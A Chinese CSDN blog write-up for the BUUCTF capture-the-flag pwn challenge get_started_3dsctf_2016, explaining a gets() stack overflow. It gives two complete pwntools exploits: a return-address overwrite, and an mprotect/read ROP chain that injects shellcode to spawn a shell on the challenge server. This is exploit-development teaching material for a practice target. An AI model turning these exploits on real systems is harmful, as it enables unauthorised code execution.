[BUUCTF]PWN11——get_started_3dsctf_2016

最新推荐文章于 2024-01-12 16:48:11 发布
最新推荐文章于 2024-01-12 16:48:11 发布
阅读量3.6k 收藏 23
点赞数 16
分类专栏: BUUCTF刷题记录 PWN 文章标签: 3d 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/108274091
版权

[BUUCTF]PWN11——get_started_3dsctf_2016

题目网址:https://buuoj.cn/challenges#get_started_3dsctf_2016

步骤:

第一个方法,本地打通,要自己创建一个flag.txt

例行检查,32位,开启了nx保护
在这里插入图片描述
nc一下,看看程序大概的执行情况
在这里插入图片描述
32位ida载入,shift+f12查看程序里的字符串,看到了flag.txt
在这里插入图片描述
双击跟进,ctrl+x查看哪个函数调用了它,发现了一个函数,当a1=0x308cd64f,a2=0x195719d1的时候就会读出flag
在这里插入图片描述
看一下a1和a2在栈上的参数位置,它的位置在返回地址之后,没法利用溢出覆盖来控制程序
在这里插入图片描述
这边我们要想办法绕过这个if判断,tap+空格来到这个界面,看到从0x80489bb开始,程序开始设置打开flag.txt的参数,我们只要将程序执行流跳转到这里就可以读出flag
在这里插入图片描述

根据nc时候看到的字符串,找到输入点,gets函数,存在溢出漏洞,用来溢出覆盖返回地址
在这里插入图片描述
exp:

from pwn import*

p=process('./get_started_3dsctf_2016')
payload='a'*0x38+p32(0x80489bb)
p.sendline(payload)
p.interactive()

第二个方法可以打通远程,这也应该是这道题的准确做法

一开始是想用printf泄露libc的,但是调试exp的时候老是报错,一开始是以为python里的输出是print,改了之后还是不行,就放弃了
在这里插入图片描述
在查看了其他师傅的wp之后发现这题的关键所在是程序里有一个mprotect函数,它的作用是能够修改内存的权限为可读可写可执行,然后我们就可以往栈上写入shellcode,执行即可获取shell

首先按先说一下mprotect函数:原型如下

int mprotect(void *addr, size_t len, int prot);
addr 内存启始地址
len  修改内存的长度
prot 内存的权限

首先造成溢出,让程序跳转到mprotect函数地址,去执行

payload = 'A' * 0x38 + p32(mprotect_addr)

现在需要设置mprotect函数的三个参数,本来32位程序传参是不需要借用寄存器的,但是为了能够继续控制程序,需要用到ret指令,所以这里就借用指令片段了

ctrl+s调出程序的段表,将0x80EB000地址开始修改为可读可写可执行
在这里插入图片描述
肯定有人疑问了为什么是0x80EB000而不是bss段的开头0x80EBF80,因为指定的内存区间必须包含整个内存页(4K),起始地址 start 必须是一个内存页的起始地址,并且区间长度 len 必须是页大小的整数倍。
改bss段的话效果如图,可以看到没有成功修改内存权限,因为起始地址不对,所以这边起始地址是0x80EB000
在这里插入图片描述

使用以下指令可以找到我们需要的ret指令,我们mprotect函数只要设置3个参数,这边就借用3个寄存器

 ROPgadget --binary get_started_3dsctf_2016 --only 'pop|ret' | grep pop

在这里插入图片描述
然后来设置mprotect的参数,将返回地址填上read函数,我们接下来要将shellcode读入程序段,需要继续控制程序

payload += p32(pop3_ret) 

payload += p32(mem_addr) 
payload += p32(mem_size)  
payload += p32(mem_proc)   

payload += p32(read_addr)

read函数原型

ssize_t read(int fd, void *buf, size_t count);
fd 设为0时就可以从输入端读取内容    设为0
buf 设为我们想要执行的内存地址      设为我们已找到的内存地址0x80EB000
size 适当大小就可以               只要够读入shellcode就可以,设置大点无所谓

可以看到read函数也有三个参数要设置,我们就可以继续借用上面找到的有3个寄存器的ret指令

payload += p32(pop3_ret)  

payload += p32(0)     
payload += p32(mem_addr)   
payload += p32(0x100) 

payload += p32(mem_addr)#将read函数的返回地址设置到我们修改的内存的地址,之后我们要往里面写入shellcode

到这里我们已经完成了修改内存为可读可写可执行,将程序重定向到了我们修改好后的内存地址,接下来我们只要传入shellcode即可

r.sendline(asm(shellcraft.sh()))#shellcode可以利用pwntools直接生成
                             #shellcode=asm(shellcraft.sh())

完整EXP

from pwn import *

elf = ELF('./get_started_3dsctf_2016')

r=remote('node3.buuoj.cn', 29905)

pop3_ret = 0x804951D

mem_addr = 0x80EB000
mem_size = 0x1000    
mem_proc = 0x7       

mprotect_addr = elf.symbols['mprotect']
read_addr = elf.symbols['read']


payload  = 'A' * 0x38
payload += p32(mprotect_addr)
payload += p32(pop3_ret) 


payload += p32(mem_addr) 
payload += p32(mem_size)  
payload += p32(mem_proc)   

payload += p32(read_addr)

payload += p32(pop3_ret)  


payload += p32(0)     
payload += p32(mem_addr)   
payload += p32(0x100) 

payload += p32(mem_addr)   

r.sendline(payload)

payload = asm(shellcraft.sh()) 

r.sendline(payload)

r.interactive()

在这里插入图片描述
这题的主要方法就是利用ret持续控制程序

Angel~Yan
关注
  • 16
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 11
    评论
专栏目录
get_started_3dsctf_2016 题解
lifanxin的博客
12-11 1030
Write Up知识点关键字样本运行静态分析动态调试求解思路求解脚本 知识点关键字 栈溢出,ROP + shellcode 样本 get_started_3dsctf_2016样本下载 运行 检查文件:   32位小端程序;   开启了NX保护,栈保护未开启。 运行程序: 静态分析 动态调试 求解思路 求解脚本 ...
get_started_3dsctf_2016BUUCTF】(两种解法)
qq_41696518的博客
08-27 1191
get_started_3dsctf_2016
Pwn】get_started_3dsctf_2016
ethan18的博客
07-20 208
这是一个有点难度的题目,反正我是后面去看师傅们的wp了。。。这个题目听大家讲本地的和远程的exp居然还是有差别的首先拿到文件,开始老三样查看主要看在哪个平台:32位还是64位,还有就是有没有canary,如果有的话一般来说都不会是栈溢出攻击的题目然后拖进ida这个可以看出真的是一个栈溢出攻击我们还可以看到get_flag函数看出来是直接进行溢出到第8行地址就行。但是注意,可能是由于这题目远程的时候一些奇妙问题,在我们使用远程的时候没有正常退出会导致出错,无法获取回显。
ctf【get_started_3dsctf_2016
HUANGliang_的博客
10-29 173
ret2libc a1 == 0x308CD64F && a2 == 0x195719D1 get_flag函数地址0x80489A0 main函数地址0x8048A20
BUUCTF get_started_3dsctf_2016
红叶的博客
10-29 401
最后必须要返回exit,因为本题没有开启标准输入输出,输入输出会在缓冲区呆着,而exit执行后会将缓冲区输出,则可回显flag。需要 -0x04,因为是32位程序,并且返回地址要改成 get_flag 的地址。溢出 + get_flag地址 + exit + 2个判断条件。溢出 + get_flag地址 + 2个判断条件。但是这个思路还缺少一步。key,key1的地址。
get_started_3dsctf_2016
Trick的博客
11-24 173
先看ida 发现get_flag函数需要a1和a2两个参数等于特定值就可以读到flag 可以利用main中的栈溢出进行传参 32位程序payload = offset + 函数地址 + 返回地址 + 参数 返回地址我们利用程序中的exit: exp: from pwn import * p = remote('node3.buuoj.cn',29726) context.log_level = 'debug' sleep(0.1) get_flag = 0x080489A0 exit_addr = 0x
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
awd攻防比赛总结——3s_NwGeek.docx
09-30
首先,作者介绍了比赛的规则和环境,包括多个环境、Web 和 Pwn 等。然后,作者分享了自己的战略和技巧,其中包括挖洞、补洞、溯源分析和可持续访问等。 在比赛中,作者遇到了很多的问题,例如服务器Environment会...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
3. **复用和同步**:确保所有操作都在正确的时钟边沿进行,防止竞争冒险和 metastability 问题。 4. **测试平台**:为了验证Verilog代码的正确性,需要创建一个测试平台,提供各种输入值并检查输出是否符合预期。 ...
buuctf|get_started_3dsctf_2016 1
m0_64236521的博客
05-01 639
方法一 我将文件下载后将其重命名为pwn_13,checksec一下 可以直接栈溢出,32位,进入ida gets(v4)可以栈溢出,这里没找到后门函数,只发现了get_flag函数,进去看看 只要a1,a2满足值便可以输出flag,a1和a2是函数参数,我们可以进行传入,同时为了让get_flag正常结束,我们要使其返回函数为exit() exp如下 from pwn import* p=remote('node4.buuoj.cn',26832) context.log_level='debu
BUUCTF get_started_3dsctf_2016(mprotect)
、moddemod
06-10 525
典型的栈溢出 而且还留了后门 在本地可以拿到flag.txt文件,但是远程不行! 栈不可执行 原型: int mprotect(const void *start, size_t len, int prot) start:需改写属性的内存中开始地址 len:需改写属性的内存长度 prot:需要修改为的指定值 功能: mprotect()函数可以用来修改一段指定内存区域的保护属性。 他把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。 prot可以取以下几个值: 1)PRO.
BUUCTF--get_started_3dsctf_20161
qq_30528603的博客
01-12 452
题目一进来有很多函数,盲猜是静态编译了。而且在函数堆中发现了个get_flag。信心慢慢的直接写代码返回get_flag地址。2.这题在main函数开始的时候没有压入ebp,因此计算溢出位置不用覆盖ebp。也就是说以前的old_ebp的位置变成了现在的返回地址。1.打远程的时候他将会判断参数是否合规,因此我们要构造get_flag的参数的正确性。这题我本来以为是简单的ret2text.结果还是中了小坑。4.构造垃圾数据不用b‘a',打不通。这题还有一种解法,我是看别的师傅wp才知道的。
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 325
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
CTFpwn总结 入门
热门推荐
九层台
04-26 2万+
学了那么久pwn了,基础知识终于积累的差不多了,来这个总结希望其他学pwn的人能少走一些弯路。 0x01学pwn需要哪些知识呢? 堆栈是少不了的。要知道函数调用的时候,栈中的数据是怎么放的,知道ebp在哪,知道返回地址在哪。 能看懂汇编,2条指令要清楚,ret和call。 具备这些基础知识你就能够开始学pwn了。 0x02需要注意什么 在溢出是要清楚2个...
2018护网杯pwn题目task_gettingStart_ktQeERc的writeup
iqiqiya的博客
10-13 1288
下载后   本来想先用checksec 看看有啥保护 但是却发现执行不了(这里不太明白) 看到做出的人那么多  也就没有顾虑了 载入IDA   看到关键字符串  且有/bin/sh     双击进入    发现连续三个跳转之后   就是最终结果 直接F5看伪代码    看到read()之后    这不就是栈溢出嘛  覆盖v7 v8的数据达到条件即可获得shell 栈中顺序...
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值